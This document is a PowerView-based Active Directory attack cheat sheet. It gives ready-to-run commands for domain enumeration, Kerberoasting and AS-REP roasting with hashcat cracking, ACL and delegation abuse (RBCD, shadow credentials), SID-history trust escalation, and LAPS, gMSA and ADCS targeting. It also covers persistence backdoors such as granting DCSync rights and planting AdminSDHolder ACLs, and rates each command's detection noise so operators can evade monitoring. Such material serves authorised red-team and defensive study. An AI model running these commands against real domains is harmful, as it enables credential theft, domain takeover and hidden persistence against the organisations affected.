Modern
Get-Domain*names preferred. LegacyGet-Net*aliases coexist in most builds.
| Legacy | Modern | Notes |
|---|---|---|
Get-NetDomain |
Get-Domain |
Domain information via LDAP |
Get-NetUser |
Get-DomainUser |
Modern has better filtering/properties |
Get-NetGroup |
Get-DomainGroup |
Domain group enumeration |
Get-NetComputer |
Get-DomainComputer |
Computer object enumeration |
Get-NetGPO |
Get-DomainGPO |
Group Policy enumeration |
Get-ObjectAcl |
Get-DomainObjectAcl |
ACL/ACE enumeration |
ENUMERATION
Domain Info
The SID is required for Golden/Silver Ticket attacks. Mandatory entry point.
Get-Domain
Get-Domain -Domain zirov.local
Get-DomainSID
Get-DomainController
Get-DomainController -Domain zirov.local
Domain Policy
Review before brute-forcing — check lockout threshold and Kerberos settings.
Get-DomainPolicy
(Get-DomainPolicy)."system access"
(Get-DomainPolicy)."kerberos policy"
Users
Low logoncount + old pwdlastset = possible honeypot. Check descriptions — they're often full of passwords.
Get-DomainUser
Get-DomainUser -Identity genarov69
Get-DomainUser -Properties samaccountname,pwdlastset,logoncount,badpwdcount
Get-DomainUser -LDAPFilter "(description=*pass*)"
Groups
Always recurse — nested membership is where real attack paths hide.
Get-DomainGroup
Get-DomainGroup *admin*
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain zirov.local -Recurse
Get-DomainGroup -UserName "genarov69"
Get-DomainManagedSecurityGroup | Select GroupName,ManagerName
Computers
Filter by OS or pull full attributes to identify high-value targets.
Get-DomainComputer
Get-DomainComputer -OperatingSystem "*Server 2019*"
Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp
Organizational Units
Look for OUs with linked GPOs — common privesc path via GPO abuse.
Get-DomainOU
Get-DomainOU -Properties name,gplink,distinguishedname
Get-DomainOU | Where-Object { $_.gplink -ne $null }
Map an OU to its linked GPO:
$ou = Get-DomainOU -Identity "Servers"
$gplink = $ou.gplink -replace '.*\{(.*?)\}.*','$1'
Get-DomainGPO -Identity "{$gplink}"
DNS
Useful for discovering internal services, shares, DFS, and non-standard hosts.
Get-DomainDNSZone
Get-DomainDNSZone -Domain zirov.local
Get-DomainDNSRecord -ZoneName zirov.local
Get-DomainDNSRecord -ZoneName zirov.local | Where-Object { $_.RecordType -eq "A" }
GPOs
Look for recently modified GPOs or GPOs that push users into local groups.
Get-DomainGPO
Get-DomainGPO | Select displayname,whenchanged
Get-DomainGPO -ComputerIdentity zirov-dc.zirov.local
Get-DomainGPOLocalGroup
Get-DomainGPOUserLocalGroupMapping -Identity "genarov69"
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity zirov-dc.zirov.local
Active Sessions
Get-NetLoggedon requires local admin. Get-LoggedonLocal uses remote registry (Server OS only). Both are noisy — avoid mass use on monitored networks.
Get-NetLoggedon -ComputerName zirov-dc.zirov.local
Get-LoggedonLocal -ComputerName zirov-dc.zirov.local
Get-LastLoggedon -ComputerName zirov-dc.zirov.local
Local Groups & Shares
Find-LocalAdminAccess is extremely noisy and triggers EDR. Prefer SharpHound LocalAdmin collection in monitored environments.
Find-LocalAdminAccess -Verbose
Get-NetLocalGroup -ComputerName zirov-dc.zirov.local -ListGroups
Invoke-ShareFinder -Verbose
Find-InterestingDomainShareFile -Verbose
Get-NetFileServer
ACL ABUSE
Enumerate ACLs
Always resolve GUIDs or the output is unreadable. SYSVOL is world-readable by default.
Get-DomainObjectAcl -Identity genarov69 -ResolveGUIDs
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs
(Get-Acl "AD:\CN=Administrator,CN=Users,DC=zirov,DC=local").Access
Get-PathAcl -Path "\\zirov-dc.zirov.local\sysvol"
Broad ACE Scan
Full LDAP sweep — noisy in large environments. Filter out legitimate trustees to reduce noise.
Invoke-ACLScanner -ResolveGUIDs
Find-InterestingDomainAcl -ResolveGUIDs | Select IdentityReferenceName,ObjectDN,ActiveDirectoryRights
Targeted ACE Hunting
Look for WriteDACL, GenericAll, GenericWrite on a specific object.
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | Where-Object {
$_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl"
}
ForceChangePassword
Direct access to the account without knowing the current password.
Invoke-ACLScanner -ResolveGUIDs | Where-Object {
$_.ObjectAceType -match "User-Force-Change-Password"
}
WriteDACL
Allows granting yourself any right over the target object.
Invoke-ACLScanner -ResolveGUIDs | Where-Object {
$_.ActiveDirectoryRights -match "WriteDacl"
}
DCSync Rights
Find who has replication rights outside of legitimate holders.
Get-DomainObjectAcl -Identity "DC=zirov,DC=local" -ResolveGUIDs | Where-Object {
$_.ObjectAceType -match "DS-Replication-Get-Changes" -and
$_.IdentityReferenceName -notmatch "Domain Controllers|Enterprise Domain Controllers|Domain Admins|Enterprise Admins|SYSTEM"
}
KERBEROS ATTACKS
Kerberoasting
Users with SPNs — request a TGS and crack offline. Filter by high-value services first.
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
Get-DomainUser -SPN | Where-Object { $_.serviceprincipalname -match "MSSQLSvc|http|exchange" }
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Out-File spntix.txt
Crack: hashcat -m 13100 spntix.txt wordlist.txt (RC4) or -m 19600 (AES256).
ASREPRoasting
Pre-auth disabled — no credentials needed to get the hash.
Get-DomainUser -PreauthNotRequired | Select samaccountname
Get hashes: Rubeus.exe asreproast /format:hashcat /outfile:asrephashes.txt
Crack: hashcat -m 18200 asrephashes.txt wordlist.txt
DELEGATION
Unconstrained Delegation
Compromising one of these allows capturing TGTs from any user that authenticates. Force DC authentication via Print Spooler or PetitPotam to capture a DC TGT.
Get-DomainComputer -Unconstrained | Select dnshostname,useraccountcontrol
Get-DomainUser -AllowDelegation -AdminCount | Select samaccountname
Constrained Delegation
Can impersonate any user toward the listed services via S4U2Proxy.
Get-DomainComputer -TrustedToAuth | Select dnshostname,msds-allowedtodelegateto
Get-DomainUser -TrustedToAuth | Select samaccountname,msds-allowedtodelegateto
RBCD — Find Targets
GenericWrite or GenericAll over a computer object is enough to configure RBCD.
Get-DomainComputer | Where-Object {
$_."msds-allowedtoactonbehalfofotheridentity" -ne $null
} | Select dnshostname,msds-allowedtoactonbehalfofotheridentity
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {
$_.ActiveDirectoryRights -match "GenericWrite|GenericAll" -and
$_.ObjectDN -match "CN=.*,CN=Computers"
}
RBCD — Configure
Configure after confirming write access on the target object.
$sid = Get-DomainComputer -Identity attackerPC | Select-Object -ExpandProperty objectsid
Set-DomainObject -Identity targetPC -Set @{'msds-allowedtoactonbehalfofotheridentity'=$sid}
Shadow Credentials
Requires WriteProperty on msDS-KeyCredentialLink. Add the key with Whisker, then use Rubeus with PKINIT to get a TGT without knowing the password.
Get-DomainObject -Identity targetuser -Properties msDS-KeyCredentialLink
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {
$_.ObjectAceType -match "msDS-KeyCredentialLink" -and
$_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll"
}
Full flow: Whisker.exe add /target:targetuser → PFX cert → Rubeus.exe asktgt /certificate:cert.pfx
TRUSTS
Map Trusts
Direction and type determine the attack path. Always map before attempting cross-domain lateral movement.
Get-DomainTrust
Get-DomainTrust -Domain zirov.local
Get-DomainTrust -Recurse
Get-ForestTrust
Get-ForestTrust -Forest external.local
Get-NetForestDomain -Forest zirov.local | Get-NetDomainController
| Type | Direction | Implication |
|---|---|---|
| Parent-Child | Bidirectional transitive | DA in child → SID history to parent |
| Forest | Usually one-way | Check selective auth + SID filtering |
| External | One-way non-transitive | Limited lateral movement |
| Shortcut | Bidirectional | Speeds up auth between child domains |
SID Filtering & Selective Authentication
TrustAttributes=4 means filtering is disabled — SID history abuse is possible. TrustAttributes=8 indicates selective authentication — only specific users can authenticate.
Get-DomainTrust | Select SourceName,TargetName,TrustAttributes,TrustDirection
Find-ForeignGroup -Verbose
Find-ForeignUser -Verbose
SID History Abuse
If you have DA in a child domain and SID filtering is off: get the Enterprise Admins SID from the root domain, forge a Golden Ticket with that SID in the SIDHistory field, and access root domain resources.
Get-DomainGroup -Identity "Enterprise Admins" -Domain zirov.local | Select objectsid
SPECIALIZED TARGETS
LAPS
Identify who can read local administrator passwords — direct path to lateral movement.
Find-AdmPwdExtendedRights -Identity "Workstations"
Find-LAPSDelegatedGroups
Get-DomainComputer -Identity workstation01 -Properties ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Get-DomainComputer | Where-Object { $_."ms-mcs-admpwd" -ne $null }
gMSA
Find gMSA accounts and check who can retrieve the managed password.
Get-DomainObject -LDAPFilter "(objectClass=msDS-GroupManagedServiceAccount)"
Get-DomainObject -Identity "gmsaaccount$" -Properties msDS-GroupMSAMembership
ADCS — Certificate Services
PowerView alone doesn't fully enumerate ADCS. Use Certify (Windows) or Certipy (Linux) for complete ESC detection.
Get-DomainObject -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=zirov,DC=local" -LDAPFilter "(objectclass=pKIEnrollmentService)"
Windows — full scan of CAs and vulnerable templates:
.\Certify.exe cas
.\Certify.exe find /vulnerable
Linux:
certipy find -u genarov69@zirov.local -p 'P@ssw0rd' -dc-ip 10.10.10.1 -vulnerable
| ESC | Description |
|---|---|
| ESC1 | Requestor supplies SAN → enroll as any user |
| ESC4 | Write access to template → modify for ESC1 |
| ESC8 | NTLM relay to AD CS HTTP endpoint |
Exchange
Membership in Organization Management frequently leads to DCSync via the Exchange Windows Permissions group.
Get-DomainGroup | Where-Object { $_.name -match "Exchange" }
Get-DomainGroupMember -Identity "Organization Management" -Recurse
Get-DomainGroupMember -Identity "Exchange Windows Permissions"
Get-DomainComputer | Where-Object { $_.serviceprincipalname -match "exchangeMDB|MSExchangeMTA" }
SCCM / MECM
Site servers often have highly privileged service accounts. NAA credentials are sometimes stored in plaintext in WMI.
Get-DomainGroup | Where-Object { $_.name -match "SCCM|SMS|ConfigMgr" }
Get-DomainComputer | Where-Object { $_.dnshostname -match "sccm|sms|cm" }
AdminSDHolder
Objects with admincount=1 have their ACL reset every 60 min by SDProp. A backdoor here survives DA password changes.
Get-DomainUser -AdminCount | Select samaccountname,admincount
Get-DomainComputer -AdminCount | Select dnshostname,admincount
PERSISTENCE & BACKDOORS
Group Membership Abuse
Requires GenericAll or WriteProperty on the group object. Always verify the add succeeded.
Add-DomainGroupMember -Identity "Domain Admins" -Members "genarov69"
Get-DomainGroupMember -Identity "Domain Admins" | Select MemberName
User Object Manipulation
Password reset requires ForceChangePassword or GenericAll. SPN and preauth abuse require WriteProperty. Always clean up after cracking.
Set-DomainUserPassword -Identity genarov69 -AccountPassword (ConvertTo-SecureString "N3wP@ss!" -AsPlainText -Force)
Set-DomainObject -Identity genarov69 -Set @{serviceprincipalname="fake/zirov"}
Set-DomainObject -Identity genarov69 -Clear serviceprincipalname
Set-DomainObject -Identity genarov69 -XOR @{useraccountcontrol=4194304}
ACL Backdoors
DCSync without DA — grants DS-Replication-Get-Changes + DS-Replication-Get-Changes-All. AdminSDHolder survives SDProp resets.
Add-DomainObjectAcl -TargetIdentity "DC=zirov,DC=local" -PrincipalIdentity genarov69 -Rights DCSync
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity genarov69 -Rights All
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity genarov69 -Rights WriteMembers
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=zirov,DC=local" -PrincipalIdentity genarov69 -Rights All
Alternate Credentials
All PowerView functions accept -Credential. Useful when you have creds but aren't running as that user.
$pass = ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("zirov\genarov69", $pass)
Get-Domain -Credential $cred
Get-DomainUser -Credential $cred
Invoke-UserHunter -Credential $cred
Full process impersonation:
runas /netonly /user:zirov\genarov69 powershell.exe
BLOODHOUND, SESSION HUNTING & RECIPES
Session Hunting
Invoke-UserHunter sweeps all hosts via NetSessionEnum and NetWkstaUserEnum — very noisy. Use -Stealth first (DCs + file servers only), then -CheckAccess to confirm local admin before moving laterally.
Invoke-UserHunter -Stealth -GroupName "Domain Admins"
Invoke-UserHunter -GroupName "Domain Admins" -CheckAccess
Invoke-UserHunter -UserName "genarov69"
SharpHound
Preferred collector for modern environments. DCOnly is quiet (LDAP only). All is comprehensive but very noisy.
.\SharpHound.exe -c DCOnly
.\SharpHound.exe -c All
.\SharpHound.exe -c All --domain zirov.local --ldapusername genarov69 --ldappassword "P@ssw0rd!"
.\SharpHound.exe -c All --loop --loopduration 00:30:00 --loopinterval 00:05:00
Invoke-BloodHound
PowerShell alternative when SharpHound isn't viable.
Invoke-BloodHound -CollectionMethod DCOnly
Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod All -Domain zirov.local -LDAPUser genarov69 -LDAPPass "P@ssw0rd!"
| Method | Noise | When to Use |
|---|---|---|
DCOnly |
Low | Initial recon, AV environments |
Session |
High | Only for DA session hunting |
All |
High | When noise is acceptable |
Loop |
Very High | Capture transient DA sessions |
Priority edges in BloodHound: GenericAll, GenericWrite, WriteDacl, Owns, ForceChangePassword, AllowedToDelegate, HasSIDHistory.
Recipe — Find Dangerous ACLs
Exclude built-in trustees to reduce noise and focus on real paths.
Invoke-ACLScanner -ResolveGUIDs | Where-Object {
$_.IdentityReferenceName -notmatch "SYSTEM|Domain Admins|Enterprise Admins|Administrators"
} | Select IdentityReferenceName,ObjectDN,ActiveDirectoryRights | Sort ObjectDN
Recipe — Find RBCD Targets
Computers you have write over — enough to configure RBCD and impersonate DA.
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {
$_.ActiveDirectoryRights -match "GenericWrite|GenericAll" -and
$_.ObjectAceType -eq "All" -and
$_.ObjectDN -match "CN=.*,CN=Computers"
}
Recipe — Find Shadow Credential Targets
Objects you have write over on msDS-KeyCredentialLink.
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {
$_.ObjectAceType -match "msDS-KeyCredentialLink" -and
$_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll"
}
Flow: Whisker.exe add /target:targetuser → PFX → Rubeus.exe asktgt /certificate:cert.pfx
Recipe — Find Cross-Forest Escalation
Map all forest trusts and look for foreign users/groups in the local domain.
Get-ForestTrust
Find-ForeignGroup -Verbose
Find-ForeignUser -Verbose
Get-DomainTrust | Where-Object { $_.TrustType -eq "Forest" } | Select SourceName,TargetName,TrustDirection,TrustAttributes
Recipe — Full DA Path Discovery
Run in order — from least to most noisy.
Get-DomainTrust; Get-ForestTrust
Invoke-ACLScanner -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -match "GenericAll|WriteDacl|GenericWrite" }
Get-DomainComputer -Unconstrained | Select dnshostname
Get-DomainComputer -TrustedToAuth | Select dnshostname,msds-allowedtodelegateto
Get-DomainUser -TrustedToAuth | Select samaccountname,msds-allowedtodelegateto
Invoke-UserHunter -Stealth -CheckAccess
OPSEC Reference
| Command | Noise | Notes |
|---|---|---|
Get-DomainUser |
Low | LDAP only |
Get-DomainComputer |
Low | LDAP only |
Get-DomainObjectAcl |
Low | LDAP only |
Get-DomainSPNTicket |
Low | KDC request only |
SharpHound -c DCOnly |
Low | LDAP only, no host contact |
Invoke-ACLScanner |
Medium | Large LDAP sweep |
Get-NetLoggedon |
Medium | Local admin + RPC per host |
Invoke-UserHunter -Stealth |
Medium | DCs + file servers only |
Invoke-ShareFinder |
High | SMB sweep across domain |
Invoke-UserHunter |
High | Touches all hosts |
Find-LocalAdminAccess |
Very High | SMB/RPC to all hosts |
SharpHound -c All |
Very High | Session + host enumeration |
SharpHound --Loop |
Very High | Continuous noise |